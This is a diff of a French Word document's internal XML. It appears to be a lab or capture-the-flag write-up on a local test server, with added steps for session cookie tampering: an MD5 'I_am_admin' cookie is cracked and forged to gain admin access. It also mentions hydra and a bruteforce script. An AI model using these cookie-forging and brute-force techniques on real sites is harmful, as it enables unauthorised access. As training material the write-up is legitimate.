           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>En inspectant le code source on aperçoit cette adresse mail :</w:t>
+        <w:t xml:space="preserve">En inspectant le code source on aperçoit cette adresse </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>mail</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t> :</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5283,7 +5264,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId48"/>
+                    <a:blip r:embed="rId45"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5315,7 +5296,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>En supprimant le «# »  de action et le « </w:t>
+        <w:t>En supprimant le «# </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>»  de</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> action et le « </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5345,7 +5340,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> » par </w:t>
       </w:r>
-      <w:hyperlink r:id="rId49" w:history="1">
+      <w:hyperlink r:id="rId46" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -5391,7 +5386,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId50"/>
+                    <a:blip r:embed="rId47"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5483,6 +5478,7 @@
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5490,7 +5486,17 @@
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
-        <w:t>b3a6e43ddf8b4bbb4125e5e7d23040433827759d4de1c04ea63907479a80a6b2</w:t>
+        <w:t>b</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>3a6e43ddf8b4bbb4125e5e7d23040433827759d4de1c04ea63907479a80a6b2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5561,6 +5567,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5570,6 +5577,7 @@
         <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5606,6 +5614,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5615,6 +5624,7 @@
         <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5714,6 +5724,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5723,6 +5734,7 @@
         <w:t>hydra</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5788,7 +5800,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId51"/>
+                    <a:blip r:embed="rId48"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5828,6 +5840,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5837,6 +5850,7 @@
         <w:t>sudo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5875,7 +5889,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId52"/>
+                    <a:blip r:embed="rId49"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5906,6 +5920,7 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5915,6 +5930,7 @@
         <w:t>sudo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5953,7 +5969,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId53"/>
+                    <a:blip r:embed="rId50"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5983,6 +5999,7 @@
           <w:highlight w:val="black"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5990,7 +6007,16 @@
           <w:highlight w:val="black"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>chmod +x bruteforce.sh</w:t>
+        <w:t>chmod</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +x bruteforce.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6047,7 +6073,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId54"/>
+                    <a:blip r:embed="rId51"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6256,12 +6282,821 @@
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Attaque </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Session</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">COOKIE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Tampering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>df</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>2eb4ba34ed059a1e3e89ff4dfc13445f104a1a52295214def1c4fb1693a5c3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -I </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId52" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:highlight w:val="black"/>
+          </w:rPr>
+          <w:t>http://192.168.10.22</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60864F4D" wp14:editId="1B9D1D7C">
+            <wp:extent cx="3763926" cy="1384994"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
+            <wp:docPr id="1554965561" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1554965561" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId53"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3780348" cy="1391037"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Set-Cookie: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>I_am_admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>=68934a3e9455fa72420237eb05902327</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">En allant sur </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId54" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>https://crackstation.net/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on s’aperçoit que sa valeur est « false »</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="213B2512" wp14:editId="66EBA44D">
+            <wp:extent cx="5760720" cy="495300"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="824091853" name="Image 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="824091853" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId55"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="495300"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">On l’encrypte sur </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId56" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          </w:rPr>
+          <w:t>https://md5decrypt.net/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et il prend la valeur </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>b326b5062b2f0e69046810717534cb09</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="501C6180" wp14:editId="2B60C482">
+            <wp:extent cx="3981450" cy="1663326"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2018247568" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2018247568" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId57"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3984897" cy="1664766"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Direction le code source de la page de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Sign</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>-in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pour modifier le cookie et rafraichir la page :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="652A2384" wp14:editId="19E33B0D">
+            <wp:extent cx="5760720" cy="1927860"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="697606306" name="Image 1" descr="Une image contenant texte, capture d’écran, logiciel, Page web&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="697606306" name="Image 1" descr="Une image contenant texte, capture d’écran, logiciel, Page web&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId58"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1927860"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549B0370" wp14:editId="05F62318">
+            <wp:extent cx="4010025" cy="1763533"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="682095437" name="Image 1" descr="Une image contenant texte, capture d’écran, logiciel, affichage&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="682095437" name="Image 1" descr="Une image contenant texte, capture d’écran, logiciel, affichage&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId59"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4023822" cy="1769600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
